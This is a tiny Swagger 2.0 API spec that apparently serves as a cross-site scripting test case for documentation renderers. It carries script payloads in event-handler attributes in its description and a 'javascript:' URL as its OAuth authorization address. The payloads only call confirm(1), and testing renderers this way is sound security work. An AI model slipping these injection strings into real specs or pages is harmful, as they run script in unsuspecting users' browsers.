swagger: '2.0'
info:
  version: "1.0.0"
  title: "XSS img test"
  description: 'onload="confirm(1)" <img src="https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png" onclick="confirm(1)" onerror="confirm(1)">'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: "javascript:confirm(1)//"
paths:
  /:
    get:
      responses:
        200:
          description: "Successful response"
